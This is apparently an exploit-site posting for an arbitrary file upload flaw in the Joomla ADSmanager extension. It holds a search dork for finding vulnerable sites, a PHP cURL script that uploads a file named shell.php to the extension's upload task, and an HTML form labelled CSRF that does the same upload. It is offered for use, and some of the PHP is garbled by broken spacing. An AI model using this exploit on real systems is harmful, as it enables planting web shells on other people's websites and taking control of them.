facebook facebook twitter rss

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Author: Back-DOOR , Published: 07-07-2015

# Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability




    Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org


# Date: 06/07/2015 : time : 04:42 Morning

# Exploit Author: Back-DOOR

# Vendor Homepage: www.joomprod.com

# Contact me On My page  : fb.com/BaCkDoOr.HaCkInG

# contact me on my account : fb.com/Backdoor.ma


# Software Link: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0CCUQFjAB&url=http%3A%2F%2Fextensions.joomla.org%2Fextension%2Fadsmanager&ei=hAqaVfn7O8vkUpnegcAO&usg=AFQjCNEe0pi8_ZkBXs0zd_0JqLEGTNsiXw&sig2=eD1ulkdARbhMjkDddmsjFQ

# Tested on: Kali linux

# Vulnerable File : /index.php?option=com_adsmanager&task=upload&tmpl=component

exploit :

    <?php
     
    $url 
"blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"// put URL Here
    
$post = array
    (
    
"file" => "@shell.jpg",
    
"name" => "shell.php"
    
);
    
$ch curl_init ("$url");
    
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
    
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
    
curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    
curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);
    
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);
    
curl_setopt ($chCURLOPT_POST1);
    @
curl_setopt ($chCURLOPT_POSTFIELDS$post);
    
$data curl_exec ($ch);
    
curl_close ($ch);
    echo 
$data;
     
    
?>

    #CSRF :
     
    <form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>

Like us on Facebook :